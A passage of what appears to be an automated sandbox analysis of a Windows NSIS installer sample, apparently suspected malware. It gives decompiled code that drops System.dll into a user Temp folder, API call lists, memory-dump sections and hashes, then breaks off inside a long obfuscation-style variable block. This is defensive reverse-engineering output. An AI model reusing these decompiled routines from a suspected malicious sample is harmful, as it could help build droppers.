                                                                                				E00406528(0x40a450);
                                                                                				while(1) {
                                                                                					__eflags =  *(_t85 + 8) - 3;
                                                                                					if( *(_t85 + 8) >= 3) {
                                                                                						_t64 = E004065C1(0x40a450);
                                                                                						_t77 = 0;
                                                                                						__eflags = _t64 - _t75;
                                                                                						if(_t64 != _t75) {
                                                                                							_t71 = _t64 + 0x14;
                                                                                							__eflags = _t71;
                                                                                							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
                                                                                						}
                                                                                						asm("sbb eax, eax");
                                                                                						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                                                						__eflags = _t70;
                                                                                						 *(_t85 + 8) = _t70;
                                                                                					}
                                                                                					__eflags =  *(_t85 + 8) - _t75;
                                                                                					if( *(_t85 + 8) == _t75) {
                                                                                						E00405DC1(0x40a450);
                                                                                					}
                                                                                					__eflags =  *(_t85 + 8) - 1;
                                                                                					_t41 = E00405DE6(0x40a450, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                                                					__eflags = _t41 - 0xffffffff;
                                                                                					 *(_t85 - 0xc) = _t41;
                                                                                					if(_t41 != 0xffffffff) {
                                                                                						break;
                                                                                					}
                                                                                					__eflags =  *(_t85 + 8) - _t75;
                                                                                					if( *(_t85 + 8) != _t75) {
                                                                                						E00405374(0xffffffe2,  *(_t85 - 8));
                                                                                						__eflags =  *(_t85 + 8) - 2;
                                                                                						if(__eflags == 0) {
                                                                                							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                                                						}
                                                                                						L31:
                                                                                						 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t85 - 4));
                                                                                						__eflags =  *0x42f4e8;
                                                                                						goto L32;
                                                                                					} else {
                                                                                						E0040624D(0x40ac50, 0x430000);
                                                                                						E0040624D(0x430000, 0x40a450);
                                                                                						E004062E0(_t75, 0x40ac50, 0x40a450, "C:\Users\jones\AppData\Local\Temp\nsc77A8.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x14)));
                                                                                						E0040624D(0x430000, 0x40ac50);
                                                                                						_t62 = E00405969("C:\Users\jones\AppData\Local\Temp\nsc77A8.tmp\System.dll",  *(_t85 - 0x28) >> 3) - 4;
                                                                                						__eflags = _t62;
                                                                                						if(_t62 == 0) {
                                                                                							continue;
                                                                                						} else {
                                                                                							__eflags = _t62 == 1;
                                                                                							if(_t62 == 1) {
                                                                                								 *0x42f4e8 =  &( *0x42f4e8->dwLowDateTime);
                                                                                								L32:
                                                                                								_t49 = 0;
                                                                                								__eflags = 0;
                                                                                							} else {
                                                                                								_push(0x40a450);
                                                                                								_push(0xfffffffa);
                                                                                								E00405374();
                                                                                								L29:
                                                                                								_t49 = 0x7fffffff;
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					L33:
                                                                                					return _t49;
                                                                                				}
                                                                                				E00405374(0xffffffea,  *(_t85 - 8));
                                                                                				 *0x42f514 =  *0x42f514 + 1;
                                                                                				_t43 = E004031B7(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
                                                                                				 *0x42f514 =  *0x42f514 - 1;
                                                                                				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
                                                                                				_t80 = _t43;
                                                                                				if( *(_t85 - 0x1c) != 0xffffffff) {
                                                                                					L22:
                                                                                					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
                                                                                				} else {
                                                                                					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
                                                                                					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
                                                                                						goto L22;
                                                                                					}
                                                                                				}
                                                                                				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
                                                                                				__eflags = _t80 - _t75;
                                                                                				if(_t80 >= _t75) {
                                                                                					goto L31;
                                                                                				} else {
                                                                                					__eflags = _t80 - 0xfffffffe;
                                                                                					if(_t80 != 0xfffffffe) {
                                                                                						E004062E0(_t75, _t80, 0x40a450, 0x40a450, 0xffffffee);
                                                                                					} else {
                                                                                						E004062E0(_t75, _t80, 0x40a450, 0x40a450, 0xffffffe9);
                                                                                						lstrcatA(0x40a450,  *(_t85 - 8));
                                                                                					}
                                                                                					_push(0x200010);
                                                                                					_push(0x40a450);
                                                                                					E00405969();
                                                                                					goto L29;
                                                                                				}
                                                                                				goto L33;
                                                                                			}

















                                                                                APIs
                                                                                • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
                                                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2
                                                                                  • Part of subcall function 0040624D: lstrcpynA.KERNEL32(?,?,00000400,00403558,Setup Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040625A
                                                                                  • Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                                  • Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                                  • Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                                  • Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                                  • Part of subcall function 00405374: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
                                                                                  • Part of subcall function 00405374: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
                                                                                  • Part of subcall function 00405374: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsc77A8.tmp\System.dll$Call
                                                                                • API String ID: 1941528284-3163409623
                                                                                • Opcode ID: 557ef526f42ec28edab53691d762c079f4bd310eaf31ddc110736b3ad8fce03f
                                                                                • Instruction ID: 5f47ace1ae7a1eefb157477671532b43bdd4633c8b8a9d03c9106597174e7376
                                                                                • Opcode Fuzzy Hash: 557ef526f42ec28edab53691d762c079f4bd310eaf31ddc110736b3ad8fce03f
                                                                                • Instruction Fuzzy Hash: 7E418431900515BACF107BB58D45EAF3679DF05368F20827FF422B20E1DA7C9A529A6D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 72%
                                                                                			E6EEE42B4(void* __ecx, void* __edx, void* __eflags, WCHAR* _a4) {
                                                                                				intOrPtr _v8;
                                                                                				signed int _v12;
                                                                                				signed int _v16;
                                                                                				signed int _v20;
                                                                                				char _v24;
                                                                                				char _v25;
                                                                                				char _v26;
                                                                                				char _v27;
                                                                                				char _v28;
                                                                                				char _v29;
                                                                                				char _v30;
                                                                                				char _v31;
                                                                                				char _v32;
                                                                                				char _v33;
                                                                                				char _v34;
                                                                                				char _v35;
                                                                                				char _v36;
                                                                                				char _v37;
                                                                                				char _v38;
                                                                                				char _v39;
                                                                                				char _v40;
                                                                                				char _v41;
                                                                                				char _v42;
                                                                                				char _v43;
                                                                                				char _v44;
                                                                                				char _v45;
                                                                                				char _v46;
                                                                                				char _v47;
                                                                                				char _v48;
                                                                                				char _v49;
                                                                                				char _v50;
                                                                                				char _v51;
                                                                                				char _v52;
                                                                                				char _v53;
                                                                                				char _v54;
                                                                                				char _v55;
                                                                                				char _v56;
                                                                                				intOrPtr _v60;
                                                                                				intOrPtr _v64;
                                                                                				short _v68;
                                                                                				short _v70;
                                                                                				short _v72;
                                                                                				short _v74;
                                                                                				short _v76;
                                                                                				short _v78;
                                                                                				short _v80;
                                                                                				short _v82;
                                                                                				short _v84;
                                                                                				short _v86;
                                                                                				short _v88;
                                                                                				short _v90;
                                                                                				short _v92;
                                                                                				short _v94;
                                                                                				short _v96;
                                                                                				short _v98;
                                                                                				short _v100;
                                                                                				short _v102;
                                                                                				short _v104;
                                                                                				short _v106;
                                                                                				short _v108;
                                                                                				short _v110;
                                                                                				short _v112;
                                                                                				short _v114;
                                                                                				short _v116;
                                                                                				short _v118;
                                                                                				short _v120;
                                                                                				short _v122;
                                                                                				short _v124;
                                                                                				short _v126;
                                                                                				short _v128;
                                                                                				short _v130;
                                                                                				short _v132;
                                                                                				short _v134;
                                                                                				short _v136;
                                                                                				short _v138;
                                                                                				short _v140;
                                                                                				short _v142;
                                                                                				short _v144;
                                                                                				short _v146;
                                                                                				short _v148;
                                                                                				short _v150;
                                                                                				short _v152;
                                                                                				short _v154;
                                                                                				short _v156;
                                                                                				short _v158;
                                                                                				short _v160;
                                                                                				short _v162;
                                                                                				short _v164;
                                                                                				short _v166;
                                                                                				short _v168;
                                                                                				short _v170;
                                                                                				short _v172;
                                                                                				short _v174;
                                                                                				short _v176;
                                                                                				short _v178;
                                                                                				short _v180;
                                                                                				short _v182;
                                                                                				short _v184;
                                                                                				short _v186;
                                                                                				short _v188;
                                                                                				short _v190;
                                                                                				short _v192;
                                                                                				short _v194;
                                                                                				short _v196;
                                                                                				short _v198;
                                                                                				short _v200;
                                                                                				short _v202;
                                                                                				short _v204;
                                                                                				short _v206;
                                                                                				short _v208;
                                                                                				short _v210;
                                                                                				short _v212;
                                                                                				short _v214;
                                                                                				short _v216;
                                                                                				short _v218;
                                                                                				short _v220;
                                                                                				short _v222;
                                                                                				short _v224;
                                                                                				short _v226;
                                                                                				short _v228;
                                                                                				short _v230;
                                                                                				short _v232;
                                                                                				short _v234;
                                                                                				short _v236;
                                                                                				short _v238;
                                                                                				short _v240;
                                                                                				short _v242;
                                                                                				short _v244;
                                                                                				short _v246;
                                                                                				short _v248;
                                                                                				short _v250;
                                                                                				short _v252;
                                                                                				short _v254;
                                                                                				short _v256;
                                                                                				short _v258;
                                                                                				short _v260;
                                                                                				short _v262;
                                                                                				short _v264;
                                                                                				short _v266;
                                                                                				short _v268;
                                                                                				short _v270;
                                                                                				short _v272;
                                                                                				short _v274;
                                                                                				short _v276;
                                                                                				short _v278;
                                                                                				short _v280;
                                                                                				short _v282;
                                                                                				short _v284;
                                                                                				short _v286;
                                                                                				short _v288;
                                                                                				short _v290;
                                                                                				short _v292;
                                                                                				short _v294;
                                                                                				short _v296;
                                                                                				short _v298;
                                                                                				short _v300;
                                                                                				short _v302;
                                                                                				short _v304;
                                                                                				short _v306;
                                                                                				short _v308;
                                                                                				short _v310;
                                                                                				short _v312;
                                                                                				short _v314;
                                                                                				short _v316;
                                                                                				short _v318;
                                                                                				short _v320;
                                                                                				short _v322;
                                                                                				short _v324;
                                                                                				short _v326;
                                                                                				short _v328;
                                                                                				short _v330;
                                                                                				short _v332;
                                                                                				short _v334;
                                                                                				short _v336;
                                                                                				short _v338;
                                                                                				short _v340;
                                                                                				short _v342;
                                                                                				short _v344;
                                                                                				short _v346;
                                                                                				short _v348;
                                                                                				short _v350;
                                                                                				short _v352;
                                                                                				short _v354;
                                                                                				short _v356;
                                                                                				short _v358;
                                                                                				short _v360;
                                                                                				short _v362;
                                                                                				short _v364;
                                                                                				short _v366;
                                                                                				short _v368;
                                                                                				short _v370;
                                                                                				short _v372;
                                                                                				short _v374;
                                                                                				short _v376;
                                                                                				short _v378;
                                                                                				short _v380;
                                                                                				short _v382;
                                                                                				short _v384;
                                                                                				short _v386;
                                                                                				short _v388;
                                                                                				short _v390;
                                                                                				short _v392;
                                                                                				short _v394;
                                                                                				short _v396;
                                                                                				short _v398;
                                                                                				short _v400;
                                                                                				short _v402;
                                                                                				short _v404;
                                                                                				short _v406;
                                                                                				short _v408;
                                                                                				short _v410;
                                                                                				short _v412;
                                                                                				short _v414;
                                                                                				short _v416;
                                                                                				short _v418;
                                                                                				short _v420;
                                                                                				short _v422;
                                                                                				short _v424;
                                                                                				short _v426;
                                                                                				short _v428;
                                                                                				short _v430;
                                                                                				short _v432;
                                                                                				short _v434;
                                                                                				short _v436;
                                                                                				short _v438;
                                                                                				short _v440;
                                                                                				short _v442;
                                                                                				short _v444;
                                                                                				short _v446;
                                                                                				short _v448;
                                                                                				short _v450;
                                                                                				short _v452;
                                                                                				short _v454;
                                                                                				short _v456;
                                                                                				short _v458;
                                                                                				short _v460;
                                                                                				short _v462;
                                                                                				short _v464;
                                                                                				short _v466;
                                                                                				short _v468;
                                                                                				short _v470;
                                                                                				short _v472;
                                                                                				short _v474;
                                                                                				short _v476;
                                                                                				short _v478;
                                                                                				short _v480;
                                                                                				short _v482;
                                                                                				short _v484;
                                                                                				short _v486;
                                                                                				short _v488;
                                                                                				short _v490;
                                                                                				short _v492;
                                                                                				short _v494;
                                                                                				short _v496;
                                                                                				short _v498;
                                                                                				short _v500;
                                                                                				short _v502;
                                                                                				short _v504;
                                                                                				short _v506;
                                                                                				short _v508;
                                                                                				short _v510;
                                                                                				short _v512;
                                                                                				short _v514;
                                                                                				short _v516;
                                                                                				short _v518;
                                                                                				short _v520;
                                                                                				short _v522;
                                                                                				short _v524;
                                                                                				short _v526;
                                                                                				short _v528;
                                                                                				short _v530;
                                                                                				short _v532;
                                                                                				short _v534;
                                                                                				short _v536;
                                                                                				short _v538;
                                                                                				short _v540;
                                                                                				short _v542;
                                                                                				short _v544;
                                                                                				short _v546;
                                                                                				short _v548;
                                                                                				short _v550;
                                                                                				short _v552;
                                                                                				short _v554;
                                                                                				short _v556;
                                                                                				short _v558;
                                                                                				short _v560;
                                                                                				short _v562;
                                                                                				short _v564;
                                                                                				short _v566;
                                                                                				short _v568;
                                                                                				short _v570;
                                                                                				short _v572;
                                                                                				short _v574;
                                                                                				short _v576;
                                                                                				short _v578;
                                                                                				short _v580;
                                                                                				short _v582;
                                                                                				short _v584;
                                                                                				short _v586;
                                                                                				char _v588;
                                                                                				short _v592;
                                                                                				short _v594;
                                                                                				short _v596;
                                                                                				short _v598;
                                                                                				short _v600;
                                                                                				short _v602;
                                                                                				short _v604;
                                                                                				short _v606;
                                                                                				short _v608;
                                                                                				short _v610;
                                                                                				short _v612;
                                                                                				short _v614;
                                                                                				short _v616;
                                                                                				short _v618;
                                                                                				short _v620;
                                                                                				short _v622;
                                                                                				short _v624;
                                                                                				short _v626;
                                                                                				short _v628;
                                                                                				short _v630;
                                                                                				short _v632;
                                                                                				short _v634;
                                                                                				short _v636;
                                                                                				short _v638;
                                                                                				short _v640;
                                                                                				short _v642;
                                                                                				short _v644;
                                                                                				short _v646;
                                                                                				short _v648;
                                                                                				short _v650;
                                                                                				short _v652;
                                                                                				short _v654;
                                                                                				short _v656;
                                                                                				short _v658;
                                                                                				short _v660;
                                                                                				short _v662;
                                                                                				short _v664;
                                                                                				short _v666;
                                                                                				short _v668;
                                                                                				short _v670;
                                                                                				short _v672;
                                                                                				short _v674;
                                                                                				short _v676;
                                                                                				short _v678;
                                                                                				short _v680;
                                                                                				short _v682;
                                                                                				short _v684;
                                                                                				short _v686;
                                                                                				short _v688;
                                                                                				short _v690;
                                                                                				short _v692;
                                                                                				short _v694;
                                                                                				short _v696;
                                                                                				short _v698;
                                                                                				short _v700;
                                                                                				short _v702;
                                                                                				short _v704;
                                                                                				short _v706;
                                                                                				short _v708;
                                                                                				short _v710;
                                                                                				short _v712;
                                                                                				short _v714;
                                                                                				short _v716;
                                                                                				short _v718;
                                                                                				short _v720;
                                                                                				short _v722;
                                                                                				short _v724;
                                                                                				short _v726;
                                                                                				short _v728;
                                                                                				short _v730;
                                                                                				short _v732;
                                                                                				short _v734;
                                                                                				short _v736;
                                                                                				short _v738;
                                                                                				short _v740;
                                                                                				short _v742;
                                                                                				short _v744;
                                                                                				short _v746;
                                                                                				short _v748;
                                                                                				short _v750;
                                                                                				short _v752;
                                                                                				short _v754;
                                                                                				short _v756;
                                                                                				short _v758;
                                                                                				short _v760;
                                                                                				short _v762;
                                                                                				short _v764;
                                                                                				short _v766;
                                                                                				short _v768;
                                                                                				short _v770;
                                                                                				short _v772;
                                                                                				short _v774;
                                                                                				short _v776;
                                                                                				short _v778;
                                                                                				short _v780;
                                                                                				short _v782;
                                                                                				short _v784;
                                                                                				short _v786;
                                                                                				short _v788;
                                                                                				short _v790;
                                                                                				short _v792;
                                                                                				short _v794;
                                                                                				short _v796;
                                                                                				short _v798;
                                                                                				short _v800;
                                                                                				short _v802;
                                                                                				short _v804;
                                                                                				short _v806;
                                                                                				short _v808;
                                                                                				short _v810;
                                                                                				short _v812;
                                                                                				short _v814;
                                                                                				short _v816;
                                                                                				short _v818;
                                                                                				short _v820;
                                                                                				short _v822;
                                                                                				short _v824;
                                                                                				short _v826;
                                                                                				short _v828;
                                                                                				short _v830;
                                                                                				short _v832;
                                                                                				short _v834;
                                                                                				short _v836;
                                                                                				short _v838;
                                                                                				short _v840;
                                                                                				short _v842;
                                                                                				short _v844;
                                                                                				short _v846;
                                                                                				short _v848;
                                                                                				short _v850;
                                                                                				short _v852;
                                                                                				short _v854;
                                                                                				short _v856;
                                                                                				short _v858;
                                                                                				short _v860;
                                                                                				short _v862;
                                                                                				short _v864;
                                                                                				short _v866;
                                                                                				short _v868;
                                                                                				short _v870;
                                                                                				short _v872;
                                                                                				short _v874;
                                                                                				short _v876;
                                                                                				short _v878;
                                                                                				short _v880;
                                                                                				short _v882;
                                                                                				short _v884;
                                                                                				short _v886;
                                                                                				short _v888;
                                                                                				short _v890;
                                                                                				short _v892;
                                                                                				short _v894;
                                                                                				short _v896;
                                                                                				short _v898;
                                                                                				short _v900;
                                                                                				short _v902;
                                                                                				short _v904;
                                                                                				short _v906;
                                                                                				short _v908;
                                                                                				short _v910;
                                                                                				short _v912;
                                                                                				short _v914;
                                                                                				short _v916;
                                                                                				short _v918;
                                                                                				short _v920;
                                                                                				short _v922;
                                                                                				short _v924;
                                                                                				short _v926;
                                                                                				short _v928;
                                                                                				short _v930;
                                                                                				short _v932;
                                                                                				short _v934;
                                                                                				short _v936;
                                                                                				short _v938;
                                                                                				short _v940;
                                                                                				short _v942;
                                                                                				short _v944;
                                                                                				short _v946;
                                                                                				short _v948;
                                                                                				short _v950;
                                                                                				short _v952;
                                                                                				short _v954;
                                                                                				short _v956;
                                                                                				short _v958;
                                                                                				short _v960;
                                                                                				short _v962;
                                                                                				short _v964;
                                                                                				short _v966;
                                                                                				short _v968;
                                                                                				short _v970;
                                                                                				short _v972;
                                                                                				short _v974;
                                                                                				short _v976;
                                                                                				short _v978;
                                                                                				short _v980;
                                                                                				short _v982;
                                                                                				short _v984;
                                                                                				short _v986;
                                                                                				short _v988;
                                                                                				short _v990;
                                                                                				short _v992;
                                                                                				short _v994;
                                                                                				short _v996;
                                                                                				short _v998;
                                                                                				short _v1000;
                                                                                				short _v1002;
                                                                                				short _v1004;
                                                                                				short _v1006;
                                                                                				short _v1008;
                                                                                				short _v1010;
                                                                                				short _v1012;
                                                                                				short _v1014;
                                                                                				short _v1016;
                                                                                				short _v1018;
                                                                                				short _v1020;
                                                                                				short _v1022;
                                                                                				short _v1024;
                                                                                				short _v1026;
                                                                                				short _v1028;
                                                                                				short _v1030;
                                                                                				short _v1032;
                                                                                				short _v1034;
                                                                                				short _v1036;
                                                                                				short _v1038;
                                                                                				short _v1040;
                                                                                				short _v1042;
                                                                                				short _v1044;
                                                                                				short _v1046;
                                                                                				short _v1048;
                                                                                				short _v1050;
                                                                                				short _v1052;
                                                                                				short _v1054;
                                                                                				short _v1056;
                                                                                				short _v1058;
                                                                                				short _v1060;
                                                                                				short _v1062;
                                                                                				short _v1064;
                                                                                				short _v1066;
                                                                                				short _v1068;
                                                                                				short _v1070;
                                                                                				short _v1072;
                                                                                				short _v1074;
                                                                                				short _v1076;
                                                                                				short _v1078;
                                                                                				short _v1080;
                                                                                				short _v1082;
                                                                                				short _v1084;
                                                                                				short _v1086;
                                                                                				short _v1088;
                                                                                				short _v1090;
                                                                                				short _v1092;
                                                                                				short _v1094;
                                                                                				short _v1096;
                                                                                				short _v1098;
                                                                                				short _v1100;
                                                                                				short _v1102;
                                                                                				short _v1104;
                                                                                				short _v1106;
                                                                                				short _v1108;
                                                                                				short _v1110;
                                                                                				char _v1112;
                                                                                				short _v1116;
                                                                                				short _v1118;
                                                                                				short _v1120;
                                                                                				short _v1122;
                                                                                				short _v1124;
                                                                                				short _v1126;
                                                                                				short _v1128;
                                                                                				short _v1130;
                                                                                				short _v1132;
                                                                                				short _v1134;
                                                                                				short _v1136;
                                                                                				short _v1138;
                                                                                				short _v1140;
                                                                                				short _v1142;
                                                                                				short _v1144;
                                                                                				short _v1146;
                                                                                				short _v1148;
                                                                                				short _v1150;
                                                                                				short _v1152;
                                                                                				short _v1154;
                                                                                				short _v1156;
                                                                                				short _v1158;
                                                                                				short _v1160;
                                                                                				short _v1162;
                                                                                				short _v1164;
                                                                                				short _v1166;
                                                                                				short _v1168;
                                                                                				short _v1170;
                                                                                				short _v1172;
                                                                                				short _v1174;
                                                                                				short _v1176;
                                                                                				short _v1178;
                                                                                				short _v1180;
                                                                                				short _v1182;
                                                                                				short _v1184;
                                                                                				short _v1186;
                                                                                				short _v1188;
                                                                                				short _v1190;
                                                                                				short _v1192;
                                                                                				short _v1194;
                                                                                				short _v1196;
                                                                                				short _v1198;
                                                                                				short _v1200;
                                                                                				short _v1202;
                                                                                				short _v1204;
                                                                                				short _v1206;
                                                                                				short _v1208;
                                                                                				short _v1210;
                                                                                				short _v1212;
                                                                                				short _v1214;
                                                                                				short _v1216;
                                                                                				short _v1218;
                                                                                				short _v1220;
                                                                                				short _v1222;
                                                                                				short _v1224;
                                                                                				short _v1226;
                                                                                				short _v1228;
                                                                                				short _v1230;
                                                                                				short _v1232;
                                                                                				short _v1234;
                                                                                				short _v1236;
                                                                                				short _v1238;
                                                                                				short _v1240;
                                                                                				short _v1242;
                                                                                				short _v1244;
                                                                                				short _v1246;
                                                                                				short _v1248;
                                                                                				short _v1250;
                                                                                				short _v1252;
                                                                                				short _v1254;
                                                                                				short _v1256;
                                                                                				short _v1258;
                                                                                				short _v1260;
                                                                                				short _v1262;
                                                                                				short _v1264;
                                                                                				short _v1266;
                                                                                				short _v1268;
                                                                                				short _v1270;
                                                                                				short _v1272;
                                                                                				short _v1274;
                                                                                				short _v1276;
                                                                                				short _v1278;
                                                                                				short _v1280;
                                                                                				short _v1282;
                                                                                				short _v1284;
                                                                                				short _v1286;
                                                                                				short _v1288;
                                                                                				short _v1290;
                                                                                				short _v1292;
                                                                                				short _v1294;
                                                                                				short _v1296;
                                                                                				short _v1298;
                                                                                				short _v1300;
                                                                                				short _v1302;
                                                                                				short _v1304;
                                                                                				short _v1306;
                                                                                				short _v1308;
                                                                                				short _v1310;
                                                                                				short _v1312;
                                                                                				short _v1314;
                                                                                				short _v1316;
                                                                                				short _v1318;
                                                                                				short _v1320;
                                                                                				short _v1322;
                                                                                				short _v1324;
                                                                                				short _v1326;
                                                                                				short _v1328;
                                                                                				short _v1330;
                                                                                				short _v1332;
                                                                                				short _v1334;
                                                                                				short _v1336;
                                                                                				short _v1338;
                                                                                				short _v1340;
                                                                                				short _v1342;
                                                                                				short _v1344;
                                                                                				short _v1346;
                                                                                				short _v1348;
                                                                                				short _v1350;
                                                                                				short _v1352;
                                                                                				short _v1354;
                                                                                				short _v1356;
                                                                                				short _v1358;
                                                                                				short _v1360;
                                                                                				short _v1362;
                                                                                				short _v1364;
                                                                                				short _v1366;
                                                                                				short _v1368;
                                                                                				short _v1370;
                                                                                				short _v1372;
                                                                                				short _v1374;
                                                                                				short _v1376;
                                                                                				short _v1378;
                                                                                				short _v1380;
                                                                                				short _v1382;
                                                                                				short _v1384;
                                                                                				short _v1386;
                                                                                				short _v1388;
                                                                                				short _v1390;
                                                                                				short _v1392;
                                                                                				short _v1394;
                                                                                				short _v1396;
                                                                                				short _v1398;
                                                                                				short _v1400;
                                                                                				short _v1402;
                                                                                				short _v1404;
                                                                                				short _v1406;
                                                                                				short _v1408;
                                                                                				short _v1410;
                                                                                				short _v1412;
                                                                                				short _v1414;
                                                                                				short _v1416;
                                                                                				short _v1418;
                                                                                				short _v1420;
                                                                                				short _v1422;
                                                                                				short _v1424;
                                                                                				short _v1426;
                                                                                				short _v1428;
                                                                                				short _v1430;
                                                                                				short _v1432;
                                                                                				short _v1434;
                                                                                				short _v1436;
                                                                                				short _v1438;
                                                                                				short _v1440;
                                                                                				short _v1442;
                                                                                				short _v1444;
                                                                                				short _v1446;
                                                                                				short _v1448;
                                                                                				short _v1450;
                                                                                				short _v1452;
                                                                                				short _v1454;
                                                                                				short _v1456;
                                                                                				short _v1458;
                                                                                				short _v1460;
                                                                                				short _v1462;
                                                                                				short _v1464;
                                                                                				short _v1466;
                                                                                				short _v1468;
                                                                                				short _v1470;
                                                                                				short _v1472;
                                                                                				short _v1474;
                                                                                				short _v1476;
                                                                                				short _v1478;
                                                                                				short _v1480;
                                                                                				short _v1482;
                                                                                				short _v1484;
                                                                                				short _v1486;
                                                                                				short _v1488;
                                                                                				short _v1490;
                                                                                				short _v1492;
                                                                                				short _v1494;
                                                                                				short _v1496;
                                                                                				short _v1498;
                                                                                				short _v1500;
                                                                                				short _v1502;
                                                                                				short _v1504;
                                                                                				short _v1506;
                                                                                				short _v1508;
                                                                                				short _v1510;
                                                                                				short _v1512;
                                                                                				short _v1514;
                                                                                				short _v1516;
                                                                                				short _v1518;
                                                                                				short _v1520;
                                                                                				short _v1522;
                                                                                				short _v1524;
                                                                                				short _v1526;
                                                                                				short _v1528;
                                                                                				short _v1530;
                                                                                				short _v1532;
                                                                                				short _v1534;
                                                                                				short _v1536;
                                                                                				short _v1538;
                                                                                				short _v1540;
                                                                                				short _v1542;
                                                                                				short _v1544;
                                                                                				short _v1546;
                                                                                				short _v1548;
                                                                                				short _v1550;
                                                                                				short _v1552;
                                                                                				short _v1554;
                                                                                				short _v1556;
                                                                                				short _v1558;
                                                                                				short _v1560;
                                                                                				short _v1562;
                                                                                				short _v1564;
                                                                                				short _v1566;
                                                                                				short _v1568;
                                                                                				short _v1570;
                                                                                				short _v1572;
                                                                                				short _v1574;
                                                                                				short _v1576;
                                                                                				short _v1578;
                                                                                				short _v1580;
                                                                                				short _v1582;
                                                                                				short _v1584;
                                                                                				short _v1586;
                                                                                				short _v1588;
                                                                                				short _v1590;
                                                                                				short _v1592;
                                                                                				short _v1594;
                                                                                				short _v1596;
                                                                                				short _v1598;
                                                                                				short _v1600;
                                                                                				short _v1602;
                                                                                				short _v1604;
                                                                                				short _v1606;
                                                                                				short _v1608;
                                                                                				short _v1610;
                                                                                				short _v1612;
                                                                                				short _v1614;
                                                                                				short _v1616;
                                                                                				short _v1618;
                                                                                				short _v1620;
                                                                                				short _v1622;
                                                                                				short _v1624;
                                                                                				short _v1626;
                                                                                				short _v1628;
                                                                                				short _v1630;
                                                                                				short _v1632;
                                                                                				short _v1634;
                                                                                				short _v1636;
                                                                                				short _v1638;
                                                                                				short _v1640;
                                                                                				short _v1642;
                                                                                				char _v1644;
                                                                                				intOrPtr _v1648;
                                                                                				intOrPtr _v1652;
                                                                                				intOrPtr _v1656;
                                                                                				intOrPtr _v1660;
                                                                                				long _v1664;
                                                                                				intOrPtr _v1668;
                                                                                				intOrPtr _v1672;
                                                                                				intOrPtr _v1676;
                                                                                				intOrPtr _v1680;
                                                                                				intOrPtr _v1684;
                                                                                				intOrPtr _v1688;
                                                                                				intOrPtr _v1692;
                                                                                				signed int _v1696;
                                                                                				intOrPtr _v1700;
                                                                                				intOrPtr _v1704;
                                                                                				char _v1720;
                                                                                				char _v1788;
                                                                                				char _v2828;
                                                                                				short _t902;
                                                                                				short _t903;
                                                                                				short _t904;
                                                                                				short _t905;
                                                                                				short _t906;
                                                                                				short _t907;
                                                                                				short _t908;
                                                                                				short _t909;
                                                                                				short _t910;
                                                                                				short _t911;
                                                                                				short _t912;
                                                                                				short _t913;
                                                                                				short _t914;
                                                                                				short _t915;
                                                                                				short _t916;
                                                                                				short _t917;
                                                                                				short _t918;
                                                                                				short _t919;
                                                                                				short _t920;
                                                                                				short _t921;
                                                                                				short _t922;
                                                                                				short _t923;
                                                                                				short _t924;
                                                                                				short _t925;
                                                                                				short _t926;
                                                                                				short _t927;
                                                                                				short _t928;
                                                                                				short _t929;
                                                                                				short _t930;
                                                                                				short _t931;
                                                                                				short _t932;
                                                                                				short _t933;
                                                                                				short _t934;
                                                                                				short _t935;
                                                                                				short _t936;
                                                                                				short _t937;
                                                                                				short _t938;
                                                                                				short _t939;
                                                                                				short _t940;
                                                                                				short _t941;
                                                                                				short _t942;
                                                                                				short _t943;
                                                                                				short _t944;
                                                                                				short _t945;
                                                                                				short _t946;
                                                                                				short _t947;
                                                                                				short _t948;
                                                                                				short _t949;
                                                                                				short _t950;
                                                                                				short _t951;
                                                                                				short _t952;
                                                                                				short _t953;
